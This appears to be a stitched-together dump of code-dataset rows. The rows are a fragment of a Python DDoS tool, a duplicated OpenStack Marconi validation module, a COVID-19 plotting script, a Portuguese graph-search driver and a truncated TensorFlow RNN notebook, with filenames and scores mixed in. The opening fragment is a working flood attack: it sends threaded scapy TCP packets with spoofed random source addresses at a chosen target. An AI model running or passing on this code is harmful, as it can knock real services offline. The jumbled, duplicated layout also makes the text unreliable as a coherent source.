colors.error('Please provide either the URL or the IP address...')
sys.exit(1)
if ip is not None:
self.target_ip = ip
elif url is not None:
self.target_ip = self.getIP(url)
else:
colors.error('Please provide URL or the IP address to attack...')
if start_port is not None:
if start_port > 0 and start_port < 65355:
self.start_port = int(start_port)
else:
self.start_port = random.randint(1, 100)
if end_port is not None:
if end_port > 1 and end_port < 65356:
self.end_port = int(end_port)
else:
self.end_port = random.randint(1000, 65355)
if dport is None:
self.dport = 80
else:
if dport < 65356 and dport > 0:
self.dport = int(dport)
else:
colors.error('Please provide a valid destination port')
sys.exit(1)
if interval is not None:
self.INTER = int(interval)
else:
self.INTER = 0.0001
if threads is not None:
threads = int(threads)
self.threadValidator(threads)
else:
self.threads = 1
self.number_of_packets = 0
def threadValidator(self, threads):
"""
Validates the number of threads
"""
if threads > 100:
choice = input('Are you sure you want to use {} threads...?'
'This can slow down your system.(Y/N)'
.format(threads))
if choice == 'N' or choice == 'n':
threads = int(input('>> Please enter the number of threads'
' you want to use...'))
self.threadValidator(threads)
else:
self.threads = threads
else:
self.threads = threads
@staticmethod
def getIP(url):
"""
Converts URL to IP
"""
url = urlparse(url)
return socket.gethostbyname(url.netloc)
@staticmethod
def generateIP():
"""
Generates random IP address
"""
ip = str(random.randint(1, 254)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255))
return ip
def generatePacket(self, ip, source_port):
"""
Generates scapy packet
"""
IP_PACKET = IP(src=ip, dst=self.target_ip)
TCP_PACKET = TCP(sport=source_port, dport=self.dport)
PKT = IP_PACKET/TCP_PACKET
return PKT
def sendPacket(self, packet):
"""
Sends the generated packets to the destination
"""
send(packet, inter=self.INTER, verbose=False)
self.number_of_packets = self.number_of_packets + 1
print('[+] Packets sent : {}'.format(self.number_of_packets), end='\r')
def attack(self):
while True:
start_index = 0
ip = self.generateIP()
break_point = random.randint(1, 25)
for _ in range(self.start_port, self.end_port):
source_port = random.randint(self.start_port, self.end_port)
newPacket = self.generatePacket(ip, source_port)
self.sendPacket(newPacket)
start_index = start_index + 1
if start_index > break_point:
break
def startAttack(self):
try:
colors.info('DDoS Attack on : {} : {}'
.format(self.target_ip, self.dport))
colors.success('DDoS Attack started, press CTRL+C to stop...')
t1 = time.time()
threads = []
for _ in range(self.threads):
newThread = threading.Thread(target=self.attack)
threads.append(newThread)
newThread.start()
for thread in threads:
thread.join()
except KeyboardInterrupt:
t2 = time.time()
colors.success('Completed in time : {}'.format(t2-t1)) | 0.322633 | 0.09187 |
import re
from oslo.config import cfg
from marconi.openstack.common.gettextutils import _
MIN_MESSAGE_TTL = 60
MIN_CLAIM_TTL = 60
MIN_CLAIM_GRACE = 60
_TRANSPORT_LIMITS_OPTIONS = (
cfg.IntOpt('max_queues_per_page', default=20,
deprecated_name='queue_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_page', default=20,
deprecated_name='message_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_claim', default=20),
cfg.IntOpt('max_queue_metadata', default=64 * 1024,
deprecated_name='metadata_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_size', default=256 * 1024,
deprecated_name='message_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_ttl', default=1209600,
deprecated_name='message_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_ttl', default=43200,
deprecated_name='claim_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_grace', default=43200,
deprecated_name='claim_grace_max',
deprecated_group='limits:transport'),
)
_TRANSPORT_LIMITS_GROUP = 'transport'
# NOTE(kgriffs): Don't use \w because it isn't guaranteed to match
# only ASCII characters.
QUEUE_NAME_REGEX = re.compile('^[a-zA-Z0-9_\-]+$')
QUEUE_NAME_MAX_LEN = 64
PROJECT_ID_MAX_LEN = 256
def _config_options():
return [(_TRANSPORT_LIMITS_GROUP, _TRANSPORT_LIMITS_OPTIONS)]
class ValidationFailed(ValueError):
"""User input did not follow API restrictions."""
def __init__(self, msg, *args, **kwargs):
msg = msg.format(*args, **kwargs)
super(ValidationFailed, self).__init__(msg)
class Validator(object):
def __init__(self, conf):
self._conf = conf
self._conf.register_opts(_TRANSPORT_LIMITS_OPTIONS,
group=_TRANSPORT_LIMITS_GROUP)
self._limits_conf = self._conf[_TRANSPORT_LIMITS_GROUP]
def queue_identification(self, queue, project):
"""Restrictions on a project id & queue name pair.
:param queue: Name of the queue
:param project: Project id
:raises: ValidationFailed if the `name` is longer than 64
characters or contains anything other than ASCII digits and
letters, underscores, and dashes. Also raises if `project`
is not None but longer than 256 characters.
"""
if project is not None and len(project) > PROJECT_ID_MAX_LEN:
msg = _(u'Project ids may not be more than {0} characters long.')
raise ValidationFailed(msg, PROJECT_ID_MAX_LEN)
if len(queue) > QUEUE_NAME_MAX_LEN:
msg = _(u'Queue names may not be more than {0} characters long.')
raise ValidationFailed(msg, QUEUE_NAME_MAX_LEN)
if not QUEUE_NAME_REGEX.match(queue):
raise ValidationFailed(
_(u'Queue names may only contain ASCII letters, digits, '
'underscores, and dashes.'))
def queue_listing(self, limit=None, **kwargs):
"""Restrictions involving a list of queues.
:param limit: The expected number of queues in the list
:param kwargs: Ignored arguments passed to storage API
:raises: ValidationFailed if the limit is exceeded
"""
uplimit = self._limits_conf.max_queues_per_page
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and no greater than {0}.')
raise ValidationFailed(msg, self._limits_conf.max_queues_per_page)
def queue_metadata_length(self, content_length):
"""Restrictions on queue's length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_queue_metadata:
msg = _(u'Queue metadata is too large. Max size: {0}')
raise ValidationFailed(msg, self._limits_conf.max_queue_metadata)
def message_posting(self, messages):
"""Restrictions on a list of messages.
:param messages: A list of messages
:raises: ValidationFailed if any message has a out-of-range
TTL.
"""
if not messages:
raise ValidationFailed(_(u'No messages to enqueu.'))
for msg in messages:
self.message_content(msg)
def message_length(self, content_length):
"""Restrictions on message post length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_message_size:
raise ValidationFailed(
_(u'Message collection size is too large. Max size {0}'),
self._limits_conf.max_message_size)
def message_content(self, message):
"""Restrictions on each message."""
ttl = message['ttl']
if not (MIN_MESSAGE_TTL <= ttl <= self._limits_conf.max_message_ttl):
msg = _(u'The TTL for a message may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_message_ttl, MIN_MESSAGE_TTL)
def message_listing(self, limit=None, **kwargs):
"""Restrictions involving a list of messages.
:param limit: The expected number of messages in the list
:param kwargs: Ignored arguments passed to storage API
:raises: ValidationFailed if the limit is exceeded
"""
uplimit = self._limits_conf.max_messages_per_page
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and may not '
'be greater than {0}.')
raise ValidationFailed(
msg, self._limits_conf.max_messages_per_page)
def claim_creation(self, metadata, limit=None):
"""Restrictions on the claim parameters upon creation.
:param metadata: The claim metadata
:param limit: The number of messages to claim
:raises: ValidationFailed if either TTL or grace is out of range,
or the expected number of messages exceed the limit.
"""
self.claim_updating(metadata)
uplimit = self._limits_conf.max_messages_per_claim
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and may not '
'be greater than {0}.')
raise ValidationFailed(
msg, self._limits_conf.max_messages_per_claim)
grace = metadata['grace']
if not (MIN_CLAIM_GRACE <= grace <= self._limits_conf.max_claim_grace):
msg = _(u'The grace for a claim may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_claim_grace, MIN_CLAIM_GRACE)
def claim_updating(self, metadata):
"""Restrictions on the claim TTL.
:param metadata: The claim metadata
:raises: ValidationFailed if the TTL is out of range
"""
ttl = metadata['ttl']
if not (MIN_CLAIM_TTL <= ttl <= self._limits_conf.max_claim_ttl):
msg = _(u'The TTL for a claim may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_message_ttl, MIN_CLAIM_TTL) | marconi/queues/transport/validation.py |
import re
from oslo.config import cfg
from marconi.openstack.common.gettextutils import _
MIN_MESSAGE_TTL = 60
MIN_CLAIM_TTL = 60
MIN_CLAIM_GRACE = 60
_TRANSPORT_LIMITS_OPTIONS = (
cfg.IntOpt('max_queues_per_page', default=20,
deprecated_name='queue_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_page', default=20,
deprecated_name='message_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_claim', default=20),
cfg.IntOpt('max_queue_metadata', default=64 * 1024,
deprecated_name='metadata_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_size', default=256 * 1024,
deprecated_name='message_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_ttl', default=1209600,
deprecated_name='message_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_ttl', default=43200,
deprecated_name='claim_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_grace', default=43200,
deprecated_name='claim_grace_max',
deprecated_group='limits:transport'),
)
_TRANSPORT_LIMITS_GROUP = 'transport'
# NOTE(kgriffs): Don't use \w because it isn't guaranteed to match
# only ASCII characters.
QUEUE_NAME_REGEX = re.compile('^[a-zA-Z0-9_\-]+$')
QUEUE_NAME_MAX_LEN = 64
PROJECT_ID_MAX_LEN = 256
def _config_options():
return [(_TRANSPORT_LIMITS_GROUP, _TRANSPORT_LIMITS_OPTIONS)]
class ValidationFailed(ValueError):
"""User input did not follow API restrictions."""
def __init__(self, msg, *args, **kwargs):
msg = msg.format(*args, **kwargs)
super(ValidationFailed, self).__init__(msg)
class Validator(object):
def __init__(self, conf):
self._conf = conf
self._conf.register_opts(_TRANSPORT_LIMITS_OPTIONS,
group=_TRANSPORT_LIMITS_GROUP)
self._limits_conf = self._conf[_TRANSPORT_LIMITS_GROUP]
def queue_identification(self, queue, project):
"""Restrictions on a project id & queue name pair.
:param queue: Name of the queue
:param project: Project id
:raises: ValidationFailed if the `name` is longer than 64
characters or contains anything other than ASCII digits and
letters, underscores, and dashes. Also raises if `project`
is not None but longer than 256 characters.
"""
if project is not None and len(project) > PROJECT_ID_MAX_LEN:
msg = _(u'Project ids may not be more than {0} characters long.')
raise ValidationFailed(msg, PROJECT_ID_MAX_LEN)
if len(queue) > QUEUE_NAME_MAX_LEN:
msg = _(u'Queue names may not be more than {0} characters long.')
raise ValidationFailed(msg, QUEUE_NAME_MAX_LEN)
if not QUEUE_NAME_REGEX.match(queue):
raise ValidationFailed(
_(u'Queue names may only contain ASCII letters, digits, '
'underscores, and dashes.'))
def queue_listing(self, limit=None, **kwargs):
"""Restrictions involving a list of queues.
:param limit: The expected number of queues in the list
:param kwargs: Ignored arguments passed to storage API
:raises: ValidationFailed if the limit is exceeded
"""
uplimit = self._limits_conf.max_queues_per_page
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and no greater than {0}.')
raise ValidationFailed(msg, self._limits_conf.max_queues_per_page)
def queue_metadata_length(self, content_length):
"""Restrictions on queue's length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_queue_metadata:
msg = _(u'Queue metadata is too large. Max size: {0}')
raise ValidationFailed(msg, self._limits_conf.max_queue_metadata)
def message_posting(self, messages):
"""Restrictions on a list of messages.
:param messages: A list of messages
:raises: ValidationFailed if any message has a out-of-range
TTL.
"""
if not messages:
raise ValidationFailed(_(u'No messages to enqueu.'))
for msg in messages:
self.message_content(msg)
def message_length(self, content_length):
"""Restrictions on message post length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_message_size:
raise ValidationFailed(
_(u'Message collection size is too large. Max size {0}'),
self._limits_conf.max_message_size)
def message_content(self, message):
"""Restrictions on each message."""
ttl = message['ttl']
if not (MIN_MESSAGE_TTL <= ttl <= self._limits_conf.max_message_ttl):
msg = _(u'The TTL for a message may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_message_ttl, MIN_MESSAGE_TTL)
def message_listing(self, limit=None, **kwargs):
"""Restrictions involving a list of messages.
:param limit: The expected number of messages in the list
:param kwargs: Ignored arguments passed to storage API
:raises: ValidationFailed if the limit is exceeded
"""
uplimit = self._limits_conf.max_messages_per_page
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and may not '
'be greater than {0}.')
raise ValidationFailed(
msg, self._limits_conf.max_messages_per_page)
def claim_creation(self, metadata, limit=None):
"""Restrictions on the claim parameters upon creation.
:param metadata: The claim metadata
:param limit: The number of messages to claim
:raises: ValidationFailed if either TTL or grace is out of range,
or the expected number of messages exceed the limit.
"""
self.claim_updating(metadata)
uplimit = self._limits_conf.max_messages_per_claim
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and may not '
'be greater than {0}.')
raise ValidationFailed(
msg, self._limits_conf.max_messages_per_claim)
grace = metadata['grace']
if not (MIN_CLAIM_GRACE <= grace <= self._limits_conf.max_claim_grace):
msg = _(u'The grace for a claim may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_claim_grace, MIN_CLAIM_GRACE)
def claim_updating(self, metadata):
"""Restrictions on the claim TTL.
:param metadata: The claim metadata
:raises: ValidationFailed if the TTL is out of range
"""
ttl = metadata['ttl']
if not (MIN_CLAIM_TTL <= ttl <= self._limits_conf.max_claim_ttl):
msg = _(u'The TTL for a claim may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_message_ttl, MIN_CLAIM_TTL) | 0.677794 | 0.096408 |
import plotly.graph_objects as go # plots
import pandas
import os
import locale
locale.setlocale(locale.LC_ALL, 'de_DE')
os.system("python plot_barchart.py")
confirmed_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_confirmed.csv")
recovered_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_recovered.csv")
deaths_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_deaths.csv")
confirmed_df = confirmed_df.set_index(['Kommune'], drop=True)
recovered_df = recovered_df.set_index(['Kommune'], drop=True)
deaths_df = deaths_df.set_index(['Kommune'], drop=True)
for kommune in confirmed_df.index.unique():
# create plot
fig = go.Figure()
kommune_short = str.split(kommune)[1].lower()
confirmed_ts = confirmed_df.loc[kommune, :].T
recovered_ts = recovered_df.loc[kommune, :].T
deaths_ts = deaths_df.loc[kommune, :].T
confirmed_ts.index = pandas.to_datetime(confirmed_ts.index)
recovered_ts.index = pandas.to_datetime(recovered_ts.index)
deaths_ts.index = pandas.to_datetime(deaths_ts.index)
fig.add_trace(
go.Scatter(
x=confirmed_ts.index,
y=confirmed_ts,
name="Infektionen " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="orange", width=4),
marker=dict(size=10),
hovertemplate="Infektionen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
go.Scatter(
x=recovered_ts.index,
y=recovered_ts,
name="Genesene " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="green", width=4),
marker=dict(size=10),
hovertemplate="genesen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
go.Scatter(
x=deaths_ts.index,
y=deaths_ts,
name="Todesfälle " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="black", width=4),
marker=dict(size=10),
hovertemplate="Todesfälle " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
last_update_date = max(confirmed_ts.index).strftime('%d. %B') #str(all_data_kommune.iloc[-1]['Last Update Day'].strftime('%d. %B'))
# ~ last_update_source = str(all_data_kommune.iloc[-1]['Source (Link)'])
fig.update_layout(
title="Coronafälle<br>" + kommune + " (Stand: " + last_update_date + ")",
xaxis_title="Datum",
yaxis_title="Fälle",
legend_orientation="h",
# disable dragmode for better mobile experience
dragmode=False,
font=dict(size=22),
xaxis_tickformat = '%d. %B'
)
# write plot to file
fig.write_html(kommune_short.lower()+'_temp.html',
include_plotlyjs=False,
full_html=False,
config={"displayModeBar": False,
"locale": "de"}
# ~ auto_open=True
)
filenames = ['header.html', kommune_short.lower()+'_temp.html', 'diff_plot_' + kommune_short.lower() + '_temp.html', 'footer.html']
with open(kommune_short.lower()+'.html', 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
os.system("rm *_temp.html") | plot_data.py | import plotly.graph_objects as go # plots
import pandas
import os
import locale
locale.setlocale(locale.LC_ALL, 'de_DE')
os.system("python plot_barchart.py")
confirmed_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_confirmed.csv")
recovered_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_recovered.csv")
deaths_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_deaths.csv")
confirmed_df = confirmed_df.set_index(['Kommune'], drop=True)
recovered_df = recovered_df.set_index(['Kommune'], drop=True)
deaths_df = deaths_df.set_index(['Kommune'], drop=True)
for kommune in confirmed_df.index.unique():
# create plot
fig = go.Figure()
kommune_short = str.split(kommune)[1].lower()
confirmed_ts = confirmed_df.loc[kommune, :].T
recovered_ts = recovered_df.loc[kommune, :].T
deaths_ts = deaths_df.loc[kommune, :].T
confirmed_ts.index = pandas.to_datetime(confirmed_ts.index)
recovered_ts.index = pandas.to_datetime(recovered_ts.index)
deaths_ts.index = pandas.to_datetime(deaths_ts.index)
fig.add_trace(
go.Scatter(
x=confirmed_ts.index,
y=confirmed_ts,
name="Infektionen " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="orange", width=4),
marker=dict(size=10),
hovertemplate="Infektionen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
go.Scatter(
x=recovered_ts.index,
y=recovered_ts,
name="Genesene " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="green", width=4),
marker=dict(size=10),
hovertemplate="genesen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
go.Scatter(
x=deaths_ts.index,
y=deaths_ts,
name="Todesfälle " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="black", width=4),
marker=dict(size=10),
hovertemplate="Todesfälle " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
last_update_date = max(confirmed_ts.index).strftime('%d. %B') #str(all_data_kommune.iloc[-1]['Last Update Day'].strftime('%d. %B'))
# ~ last_update_source = str(all_data_kommune.iloc[-1]['Source (Link)'])
fig.update_layout(
title="Coronafälle<br>" + kommune + " (Stand: " + last_update_date + ")",
xaxis_title="Datum",
yaxis_title="Fälle",
legend_orientation="h",
# disable dragmode for better mobile experience
dragmode=False,
font=dict(size=22),
xaxis_tickformat = '%d. %B'
)
# write plot to file
fig.write_html(kommune_short.lower()+'_temp.html',
include_plotlyjs=False,
full_html=False,
config={"displayModeBar": False,
"locale": "de"}
# ~ auto_open=True
)
filenames = ['header.html', kommune_short.lower()+'_temp.html', 'diff_plot_' + kommune_short.lower() + '_temp.html', 'footer.html']
with open(kommune_short.lower()+'.html', 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
os.system("rm *_temp.html") | 0.376165 | 0.189465 |
from Grafo import Grafo, Vertice, Aresta
import random
import pandas as pd
import numpy as np
from copy import deepcopy, copy
from Busca import Busca
# Criando o grafo e arestas
file = pd.read_csv(
"entrada8.txt", skiprows=1, delimiter='\t', header=None).applymap(str)
# matrixSize = int(file.readline(1).strip())
# print(file)
matrix = np.array(file)
print(matrix)
print("\n\n")
def checkValue(row, col):
if row >= matrix.shape[0] or row < 0:
return False
elif col >= matrix.shape[1] or col < 0:
return False
val = matrix[row][col]
if val == "0":
return True
elif val == "1":
return False
else:
return True
grafo = Grafo()
# Salva os nodos que contem o ouro para a heuristica
ouro = list()
def adicionaVertice(row, col):
# 0 = livre
# 1 = parede
# 2 = ouro
value = 0
if matrix[row][col] == "0":
value = 0
elif matrix[row][col] == "1":
# Se for parede nem adiciona vertice
value = 1
return None
else:
if str(row) + "." + str(col) not in ouro:
ouro.append(str(row) + "." + str(col))
value = 2
if not grafo.verticeExiste(str(row) + "." + str(col)):
v = Vertice(
str(row) + "." + str(col), {
"conteudo": value,
"row": row,
"col": col,
"linhaReta": dict()
})
grafo.adicionaVertice(v)
return v
else:
return grafo.vertice(str(row) + "." + str(col))
for row in range(matrix.shape[0]):
for col in range(matrix.shape[1]):
v = adicionaVertice(row, col)
if v == None:
continue
if checkValue(row, col - 1):
if not grafo.verticeExiste(str(row) + "." + str(col - 1)):
adicionaVertice(row, col - 1)
ar = grafo.conecta(v.nome, str(row) + "." + str(col - 1))
ar.setPeso(1)
if checkValue(row, col + 1):
if not grafo.verticeExiste(str(row) + "." + str(col + 1)):
adicionaVertice(row, col + 1)
ar = grafo.conecta(v.nome, str(row) + "." + str(col + 1))
ar.setPeso(1)
if checkValue(row - 1, col):
if not grafo.verticeExiste(str(row - 1) + "." + str(col)):
adicionaVertice(row - 1, col)
ar = grafo.conecta(v.nome, str(row - 1) + "." + str(col))
ar.setPeso(1)
if checkValue(row + 1, col):
if not grafo.verticeExiste(str(row + 1) + "." + str(col)):
adicionaVertice(row + 1, col)
ar = grafo.conecta(v.nome, str(row + 1) + "." + str(col))
ar.setPeso(1)
def busca(busca, metodo):
grafo.salvarGrafo()
metodo("0.0")
print(busca._movimento)
print("Ouro encontrado:")
print(busca._ouroEncontrado)
print("Pontuacao:")
print(busca._pontuacao)
print("Numero de movimentos:")
print(len(busca._movimento))
grafo.restaurarGrafo()
busca.limpar()
busca.manh(ouro)
print("Ouro:")
print(ouro)
print("\n\n")
b = Busca(grafo, matrix.shape[0])
b.manh(ouro)
print("A*:")
busca(b, b.Astar)
print("\n\nBest-First:")
busca(b, b.bestFirst)
print("\n\nDFS:")
busca(b, b.BuscaProfundidade)
print("\n\nBFS:")
busca(b, b.buscaLargura) | Main.py | from Grafo import Grafo, Vertice, Aresta
import random
import pandas as pd
import numpy as np
from copy import deepcopy, copy
from Busca import Busca
# Criando o grafo e arestas
file = pd.read_csv(
"entrada8.txt", skiprows=1, delimiter='\t', header=None).applymap(str)
# matrixSize = int(file.readline(1).strip())
# print(file)
matrix = np.array(file)
print(matrix)
print("\n\n")
def checkValue(row, col):
if row >= matrix.shape[0] or row < 0:
return False
elif col >= matrix.shape[1] or col < 0:
return False
val = matrix[row][col]
if val == "0":
return True
elif val == "1":
return False
else:
return True
grafo = Grafo()
# Salva os nodos que contem o ouro para a heuristica
ouro = list()
def adicionaVertice(row, col):
# 0 = livre
# 1 = parede
# 2 = ouro
value = 0
if matrix[row][col] == "0":
value = 0
elif matrix[row][col] == "1":
# Se for parede nem adiciona vertice
value = 1
return None
else:
if str(row) + "." + str(col) not in ouro:
ouro.append(str(row) + "." + str(col))
value = 2
if not grafo.verticeExiste(str(row) + "." + str(col)):
v = Vertice(
str(row) + "." + str(col), {
"conteudo": value,
"row": row,
"col": col,
"linhaReta": dict()
})
grafo.adicionaVertice(v)
return v
else:
return grafo.vertice(str(row) + "." + str(col))
for row in range(matrix.shape[0]):
for col in range(matrix.shape[1]):
v = adicionaVertice(row, col)
if v == None:
continue
if checkValue(row, col - 1):
if not grafo.verticeExiste(str(row) + "." + str(col - 1)):
adicionaVertice(row, col - 1)
ar = grafo.conecta(v.nome, str(row) + "." + str(col - 1))
ar.setPeso(1)
if checkValue(row, col + 1):
if not grafo.verticeExiste(str(row) + "." + str(col + 1)):
adicionaVertice(row, col + 1)
ar = grafo.conecta(v.nome, str(row) + "." + str(col + 1))
ar.setPeso(1)
if checkValue(row - 1, col):
if not grafo.verticeExiste(str(row - 1) + "." + str(col)):
adicionaVertice(row - 1, col)
ar = grafo.conecta(v.nome, str(row - 1) + "." + str(col))
ar.setPeso(1)
if checkValue(row + 1, col):
if not grafo.verticeExiste(str(row + 1) + "." + str(col)):
adicionaVertice(row + 1, col)
ar = grafo.conecta(v.nome, str(row + 1) + "." + str(col))
ar.setPeso(1)
def busca(busca, metodo):
grafo.salvarGrafo()
metodo("0.0")
print(busca._movimento)
print("Ouro encontrado:")
print(busca._ouroEncontrado)
print("Pontuacao:")
print(busca._pontuacao)
print("Numero de movimentos:")
print(len(busca._movimento))
grafo.restaurarGrafo()
busca.limpar()
busca.manh(ouro)
print("Ouro:")
print(ouro)
print("\n\n")
b = Busca(grafo, matrix.shape[0])
b.manh(ouro)
print("A*:")
busca(b, b.Astar)
print("\n\nBest-First:")
busca(b, b.bestFirst)
print("\n\nDFS:")
busca(b, b.BuscaProfundidade)
print("\n\nBFS:")
busca(b, b.buscaLargura) | 0.175044 | 0.339472 |
# In[13]:
import helper
import numpy as np
from distutils.version import LooseVersion
import warnings
import tensorflow as tf
from tensorflow.contrib import seq2seq
# In[14]:
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
# 建立NN网络
# In[15]:
# Check TensorFlow Version
assert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer'
print('TensorFlow Version: {}'.format(tf.__version__))
# Check for a GPU
if not tf.test.gpu_device_name():
warnings.warn('No GPU found. Please use a GPU to train your neural network.')
else:
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
# In[16]:
def get_inputs():
'''
输入初始化
'''
input_data = tf.placeholder(tf.int32,[None,None],name='input')
target_data = tf.placeholder(tf.int32,[None,None],name='target')
learning_rate = tf.placeholder(tf.float32,name='learning_rate')
return input_data, target_data, learning_rate
# In[17]:
def get_init_cell(batch_size, rnn_size):
"""
初始化 RNN Cell.
:param batch_size: Size of batches
:param rnn_size: Size of RNNs
:return: Tuple (cell, initialize state)
"""
lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)
cell = tf.contrib.rnn.MultiRNNCell([lstm]*2)
initial_state = tf.identity(cell.zero_state(batch_size, tf.float32),name='initial_state')
return cell, initial_state
# In[18]:
def get_embed(input_data, vocab_size, embed_dim):
"""
word embedding 输入.
:param input_data: 输入.
:param vocab_size: 总词语数.
:param embed_dim: w2v 维数
:return: Embedded input.
"""
#embedding 初始化,这边不采用预先训练的embeding,边训练边调参数
embedding = tf.Variable(tf.random_uniform((vocab_size,embed_dim),-1,1))
embed = tf.nn.embedding_lookup(embedding,input_data)
return embed
# In[19]:
def build_rnn(cell, inputs):
"""
:param cell: RNN Cell
:param inputs: Input text data
:return: Tuple (Outputs, Final State)
"""
Outputs,Finalstate = tf.nn.dynamic_rnn(cell,inputs,dtype=tf.float32)
Final_state = tf.identity(Finalstate,"final_state")
return Outputs,Final_state
# In[20]:
def build_nn(cell, rnn_size, input_data, vocab_size, embed_dim):
"""
:param cell: RNN cell
:param rnn_size: Size of rnns
:param input_data: Input data
:param vocab_size: Vocabulary size
:param embed_dim: Number of embedding dimensions
:return: Tuple (Logits, FinalState)
"""
embedding = get_embed(input_data,vocab_size,embed_dim)
lstm_output,final_state = build_rnn(cell,embedding)
#seq_output = tf.concat(lstm_output, axis=1)
#x = tf.reshape(seq_output,[-1,rnn_size])
#print(embedding.get_shape())
#print(lstm_output.get_shape())
#weights = tf.Variable(tf.truncated_normal([lstm_output.get_shape()[0].value,lstm_output.get_shape()[2].value,vocab_size], stddev=0.1))
#bias = tf.Variable(tf.zeros(vocab_size))
#print(weights.get_shape())
#logits = tf.matmul(lstm_output,weights)+ bias
logits = tf.contrib.layers.fully_connected(lstm_output,vocab_size,activation_fn=None)
return logits,final_state
# In[21]:
def get_batches(int_text, batch_size, seq_length):
"""
Return batches of input and target
:param int_text: Text with the words replaced by their ids
:param batch_size: The size of batch
:param seq_length: The length of sequence
:return: Batches as a Numpy array
"""
batch_output = []
characters_per_batch = seq_length*batch_size
#print(characters_per_batch)
batch_num = len(int_text)//characters_per_batch
x_full_seqs = np.array(int_text[:batch_num*characters_per_batch])
y_full_seqs = np.zeros_like(x_full_seqs)
#bound limit
if len(int_text) > batch_num*characters_per_batch:
y_full_seqs = int_text[1:batch_num*characters_per_batch + 1]
else:
y_full_seqs[:-1],y_full_seqs[-1] = int_text[1:batch_num*characters_per_batch],int_text[0]
#reshape
x_reshape = np.reshape(x_full_seqs,(batch_size,-1))
y_reshape = np.reshape(y_full_seqs,(batch_size,-1))
# print(x_reshape)
# print(batch_num)
#individual batches
x_bathes = np.split(x_reshape,batch_num,1)
y_bathes = np.split(y_reshape,batch_num,1)
# print(x_bathes[0])
# print(y_bathes[0])
for i in range(batch_num):
batch_output.append(np.stack((x_bathes[i],y_bathes[i])))
return np.array(batch_output)
# In[22]:
#设置各种超参数
num_epochs = 30
batch_size = 256
rnn_size = 512
embed_dim = 400
seq_length = 20
learning_rate = 0.002
#打印间隔
show_every_n_batches = 30
#保存路径
save_dir = './save'
# In[23]:
#build the graph
train_graph = tf.Graph()
with train_graph.as_default():
vocab_size = len(int_to_vocab)
input_text, targets, lr = get_inputs()
input_data_shape = tf.shape(input_text)
cell, initial_state = get_init_cell(input_data_shape[0], rnn_size)
logits, final_state = build_nn(cell, rnn_size, input_text, vocab_size, embed_dim)
# Probabilities for generating words
